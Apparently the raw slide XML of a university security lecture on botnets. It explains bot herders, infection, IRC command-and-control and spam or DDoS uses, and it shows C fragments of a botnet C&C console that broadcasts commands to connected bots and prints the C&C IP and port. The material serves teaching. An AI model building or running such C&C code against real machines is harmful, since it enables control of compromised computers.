              <a:rPr lang="en-US" sz="17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send(d, command_buf, strlen(command_buf), 0);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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}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}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send(fd_user, command_sent_msg, strlen(command_sent_msg), 0);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700">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="5143500"/>
            <a:ext cx="9022080" cy="1258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10000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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request command message to login.c (master)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Clr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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read command from master  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Clr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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send command to all devices that are connected to server  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6393815"/>
            <a:ext cx="12364085" cy="61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io.c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Text Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="998220"/>
            <a:ext cx="9886315" cy="11604625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr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static void clear_screen(int fd_user) {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char *clear = "\033[H\033[2J"; //It is commonly used to clear the screen and position the cursor at the top-left corner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send(fd_user, clear, strlen(clear), 0);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static void display_banner(int fd_user) {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char *banner[13];    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banner[0] = "\n                                  s    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banner[1] = "                                 :8    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banner[2] = "       u.    u.                 .88    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banner[3] = "     x@88k u@88c.      .u      :888ooo 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banner[4] = "    ^'8888''8888'   ud8888.  -*8888888 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banner[5] = "      8888  888R  :888'8888.   8888    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banner[6] = "      8888  888R  d888 '888'   8888    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banner[7] = "      8888  888R  8888.+'      8888    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banner[8] = "      8888  888R  8888L       .8888Lu= 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banner[9] = "    '*88*' 8888' '8888c. .+  ^8888*   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banner[10] = "       ''   'Y'    '888888      'Y'    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banner[11] = "                     'YP'              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banner[12] = "    [Made By: https://github.com/0x1CA3]\n\n";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for (int i = 0; i &lt; 13; i++) {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    send(fd_user, banner[i], strlen(banner[i]), 0);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}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static void help_menu(int fd_user) {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char *help_menu[9];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help_menu[0] = "\n          Commands          Description\n";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help_menu[1] = "          --------          -----------\n";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help_menu[2] = "          ?/help            Displays available commands.\n";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help_menu[3] = "          bots/list         Shows the bot count.\n";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help_menu[4] = "          command           Lets you send a command to all the devices.\n";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help_menu[5] = "          server            Shows details about the CnC server.\n";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help_menu[6] = "          banner            Displays the ASCII banner.\n";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help_menu[7] = "          clear/cls         Clears the screen.\n";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help_menu[8] = "          exit/quit         Exits the botnet.\n";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for (int i = 0; i &lt; 9; i++) {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    send(fd_user, help_menu[i], strlen(help_menu[i]), 0);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}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static void cnc_details(int fd_user) {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char cnc_details_line_1[1024];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char cnc_details_line_2[1024];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char cnc_details_line_3[1024];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char cnc_details_line_4[1024];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char cnc_details_line_5[1024];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char cnc_details_line_6[1024];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sprintf(cnc_details_line_1, "\n         CnC Details");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sprintf(cnc_details_line_2, "\n         -----------");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sprintf(cnc_details_line_3, "\n         IP: %s", CNC_IP);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sprintf(cnc_details_line_4, "\n         Port: %d", CNC_PORT);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sprintf(cnc_details_line_5, "\n         Account Name: %s", USERNAME);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sprintf(cnc_details_line_6, "\n         Account Type: Administrator\n");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send(fd_user, cnc_details_line_1, strlen(cnc_details_line_1), 0);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send(fd_user, cnc_details_line_2, strlen(cnc_details_line_2), 0);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send(fd_user, cnc_details_line_3, strlen(cnc_details_line_3), 0);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send(fd_user, cnc_details_line_4, strlen(cnc_details_line_4), 0);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send(fd_user, cnc_details_line_5, strlen(cnc_details_line_5), 0);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    send(fd_user, cnc_details_line_6, strlen(cnc_details_line_6), 0);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80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr 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>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1593215"/>
            <a:ext cx="5872480" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"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clear_screen: clear the screen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FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"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display_banner: display banner information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FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"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help_menu: give the list of commands master can use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FFFFFF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"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cnc_details:print information:master CNC_IP, server port, master USERNAME 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375 0.00425926 L 0.00598958 -0.83175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rcRect t="4519" b="16150"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-32385"/>
            <a:ext cx="12179935" cy="688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-32385"/>
            <a:ext cx="12192000" cy="690054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-19050" y="2219960"/>
            <a:ext cx="121989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charset="0"/>
                <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" charset="-122"/>
                <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
                <a:sym typeface="思源黑体 CN Normal" panose="020B0400000000000000" charset="-122"/>
              </a:rPr>
              <a:t>THE END</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="60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charset="0"/>
              <a:ea typeface="思源黑体 CN Heavy" panose="020B0A00000000000000" charset="-122"/>
              <a:cs typeface="Arial Black" panose="020B0A04020102020204" charset="0"/>
              <a:sym typeface="思源黑体 CN Normal" panose="020B0400000000000000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640129" y="6095138"/>
            <a:ext cx="2379149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2023.10.03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768215" y="3272790"/>
            <a:ext cx="265557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Fangtian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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Zhong</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="25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华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="020405020505050303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CSCI </a:t>
            </a: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591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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 15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675098" y="1732630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Freeform 159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992261" y="1228497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Freeform 159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969007" y="4372353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7" name="Freeform 298"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11101499" y="3197526"/>
            <a:ext cx="146050" cy="144463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 123 w 247"/>
              <a:gd name="T1" fmla="*/ 0 h 247"/>
              <a:gd name="T2" fmla="*/ 167 w 247"/>
              <a:gd name="T3" fmla="*/ 80 h 247"/>
              <a:gd name="T4" fmla="*/ 247 w 247"/>
              <a:gd name="T5" fmla="*/ 124 h 247"/>
              <a:gd name="T6" fmla="*/ 167 w 247"/>
              <a:gd name="T7" fmla="*/ 167 h 247"/>
              <a:gd name="T8" fmla="*/ 123 w 247"/>
              <a:gd name="T9" fmla="*/ 247 h 247"/>
              <a:gd name="T10" fmla="*/ 80 w 247"/>
              <a:gd name="T11" fmla="*/ 167 h 247"/>
              <a:gd name="T12" fmla="*/ 0 w 247"/>
              <a:gd name="T13" fmla="*/ 124 h 247"/>
              <a:gd name="T14" fmla="*/ 80 w 247"/>
              <a:gd name="T15" fmla="*/ 80 h 247"/>
              <a:gd name="T16" fmla="*/ 123 w 247"/>
              <a:gd name="T17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247">
                <a:moveTo>
                  <a:pt x="123" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="167" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="247" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="123" y="247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80" y="80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tx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302"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11362690" y="1253490"/>
            <a:ext cx="129557" cy="129557"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 75 w 151"/>
              <a:gd name="T1" fmla="*/ 0 h 150"/>
              <a:gd name="T2" fmla="*/ 102 w 151"/>
              <a:gd name="T3" fmla="*/ 48 h 150"/>
              <a:gd name="T4" fmla="*/ 151 w 151"/>
              <a:gd name="T5" fmla="*/ 75 h 150"/>
              <a:gd name="T6" fmla="*/ 102 w 151"/>
              <a:gd name="T7" fmla="*/ 102 h 150"/>
              <a:gd name="T8" fmla="*/ 75 w 151"/>
              <a:gd name="T9" fmla="*/ 150 h 150"/>
              <a:gd name="T10" fmla="*/ 49 w 151"/>
              <a:gd name="T11" fmla="*/ 102 h 150"/>
              <a:gd name="T12" fmla="*/ 0 w 151"/>
              <a:gd name="T13" fmla="*/ 75 h 150"/>
              <a:gd name="T14" fmla="*/ 49 w 151"/>
              <a:gd name="T15" fmla="*/ 48 h 150"/>
              <a:gd name="T16" fmla="*/ 75 w 151"/>
              <a:gd name="T1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0">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="102" y="48"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="48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5" name="Freeform 157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10433905" y="2017746"/>
            <a:ext cx="177215" cy="163925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 55 w 110"/>
              <a:gd name="T1" fmla="*/ 100 h 100"/>
              <a:gd name="T2" fmla="*/ 50 w 110"/>
              <a:gd name="T3" fmla="*/ 97 h 100"/>
              <a:gd name="T4" fmla="*/ 1 w 110"/>
              <a:gd name="T5" fmla="*/ 9 h 100"/>
              <a:gd name="T6" fmla="*/ 1 w 110"/>
              <a:gd name="T7" fmla="*/ 3 h 100"/>
              <a:gd name="T8" fmla="*/ 6 w 110"/>
              <a:gd name="T9" fmla="*/ 0 h 100"/>
              <a:gd name="T10" fmla="*/ 104 w 110"/>
              <a:gd name="T11" fmla="*/ 0 h 100"/>
              <a:gd name="T12" fmla="*/ 109 w 110"/>
              <a:gd name="T13" fmla="*/ 3 h 100"/>
              <a:gd name="T14" fmla="*/ 109 w 110"/>
              <a:gd name="T15" fmla="*/ 9 h 100"/>
              <a:gd name="T16" fmla="*/ 60 w 110"/>
              <a:gd name="T17" fmla="*/ 97 h 100"/>
              <a:gd name="T18" fmla="*/ 55 w 110"/>
              <a:gd name="T19" fmla="*/ 100 h 100"/>
              <a:gd name="T20" fmla="*/ 16 w 110"/>
              <a:gd name="T21" fmla="*/ 12 h 100"/>
              <a:gd name="T22" fmla="*/ 55 w 110"/>
              <a:gd name="T23" fmla="*/ 82 h 100"/>
              <a:gd name="T24" fmla="*/ 94 w 110"/>
              <a:gd name="T25" fmla="*/ 12 h 100"/>
              <a:gd name="T26" fmla="*/ 16 w 110"/>
              <a:gd name="T27" fmla="*/ 1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" h="100">
                <a:moveTo>
                  <a:pt x="55" y="100"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="100"/>
                  <a:pt x="51" y="98"/>
                  <a:pt x="50" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1" y="9"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="7"/>
                  <a:pt x="0" y="5"/>
                  <a:pt x="1" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="2"/>
                  <a:pt x="4" y="0"/>
                  <a:pt x="6" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="106" y="0"/>
                  <a:pt x="108" y="2"/>
                  <a:pt x="109" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="5"/>
                  <a:pt x="110" y="7"/>
                  <a:pt x="109" y="9"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="60" y="97"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="98"/>
                  <a:pt x="57" y="100"/>
                  <a:pt x="55" y="100"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16" y="12"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="55" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="12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2886710" y="4955540"/>
            <a:ext cx="6418580" cy="1139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Gianforte School of Computing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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" alt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charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              </a:rPr>
              <a:t>E-mail: fangtian.zhong@montana.edu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charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Palatino Linotype" panose="0204050205050503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1785" y="46355"/>
            <a:ext cx="2063115" cy="14471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1" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18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What is Bot herder?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object 2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476250" y="1023620"/>
            <a:ext cx="11333480" cy="5478145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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 marR="344805" indent="-18034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Botnet originator (bot herder, bot master) starts the process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90" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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 herder sends viruses, worms, etc. to unprotected PCs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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Direct attacks on home PC without patches or firewall</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Indirect attacks via malicious HTML files that exploit vulnerabilities (especially in MS Internet Explorer)</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Malware attacks on peer-to-peer networks</a:t>
            </a:r>
            <a:endParaRPr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720090" lvl="1" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buSzTx/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Infected PC receives, executes Trojan application ⇒ bot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90" lvl="1" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buSzTx/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 logs onto C&amp;C IRC server, waits for commands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90" lvl="1" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buSzTx/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 herder sends commands to bots via IRC server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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Send spam</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Steal serial numbers, financial information, intellectual property, etc.</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Scan servers and infect other unprotected PCs, thereby adding more “zombie” computers to botnet</a:t>
            </a:r>
            <a:endParaRPr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What is Bot?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object 2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476250" y="1023620"/>
            <a:ext cx="11333480" cy="4639310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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Bot = autonomous programs capable of acting on instructions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90" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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a large (up to several hundred thousand) group of remotely controlled “zombie” systems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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Machine owners are not aware they have been compromised</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Controlled and upgraded via IRC or P2P</a:t>
            </a:r>
            <a:endParaRPr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92405" marR="344805" indent="-180340" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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Used as the platform for various attacks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720090" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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Distributed denial of service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720090" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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Spam 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720090" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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Launching pad for new exploits/worms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What is Bot Client?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045" y="971550"/>
            <a:ext cx="495363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5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Compromising</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-2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5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sz="2500" spc="-5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500" spc="-1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machine-worms</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" spc="-1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object 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233045" y="1269365"/>
            <a:ext cx="9874885" cy="4526915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="163830" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="265430" indent="-252730" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="265430" algn="l"/>
              </a:tabLst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Botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="26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sz="26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sends</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="26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sz="26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viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="26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worms</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="26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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1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client)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90" indent="-360045" fontAlgn="auto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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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ordinary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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sz="2200" spc="-3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[trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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sz="2200" spc="-6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200" spc="-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200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i="1" spc="-2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bot]</a:t>
            </a:r>
            <a:endParaRPr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4160" indent="-251460" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:tabLst>
                <a:tab pos="264160" algn="l"/>
              </a:tabLst>
            </a:pP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The bot on the infected PC logs into an IRC server</a:t>
            </a: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90" indent="-360045" algn="l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 is known as the command-and-control server</a:t>
            </a:r>
            <a:endParaRPr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430" indent="-252730" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:tabLst>
                <a:tab pos="265430" algn="l"/>
              </a:tabLst>
            </a:pP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Attackers gets access to botnet from operator</a:t>
            </a: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90" lvl="1" indent="-360045" algn="l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Spammers</a:t>
            </a:r>
            <a:endParaRPr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430" indent="-252730" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:tabLst>
                <a:tab pos="265430" algn="l"/>
              </a:tabLst>
            </a:pP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Attackers sends instructions to the infected PCs</a:t>
            </a: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90" lvl="1" indent="-360045" algn="l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send out spam</a:t>
            </a:r>
            <a:endParaRPr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430" indent="-252730" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:tabLst>
                <a:tab pos="265430" algn="l"/>
              </a:tabLst>
            </a:pP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Infected PCs will</a:t>
            </a:r>
            <a:endParaRPr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90" lvl="1" indent="-360045" algn="l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out spam messages</a:t>
            </a:r>
            <a:endParaRPr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4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8435340" y="1999615"/>
            <a:ext cx="3440430" cy="4163695"/>
            <a:chOff x="5867400" y="2155825"/>
            <a:chExt cx="3275965" cy="3964940"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 5"/>
            <p:cNvPicPr/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867400" y="2155825"/>
              <a:ext cx="3275965" cy="3964940"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6846950" y="2232088"/>
              <a:ext cx="979805" cy="652780"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="979804" h="652780">
                  <a:moveTo>
                    <a:pt x="0" y="652462"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="979487" y="652462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979487" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6524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What is Bot C&amp;C?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object 2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285750" y="1023620"/>
            <a:ext cx="11906250" cy="5299710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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Without bot communication, botnet would not be as useful or dynamic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90" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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 servers are not best choice for bot communication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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Simpler protocol could be used</a:t>
            </a:r>
            <a:endParaRPr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99795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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Usually unencrypted, easy to get into and take over or shut down</a:t>
            </a:r>
            <a:endParaRPr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92405" marR="344805" indent="-180340" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="100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However,</a:t>
            </a:r>
            <a:endParaRPr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720090" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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IRC servers freely available, simple to set up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720090" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="q"/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst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Attackers usually have experience with IRC communication</a:t>
            </a:r>
            <a:endParaRPr sz="2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92405" marR="344805" indent="-180340" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="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Bots log into a specific IRC channel</a:t>
            </a:r>
            <a:endParaRPr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92405" marR="344805" indent="-180340" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="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Bots are written to accept specific commands and execute them (sometimes from specific users)</a:t>
            </a:r>
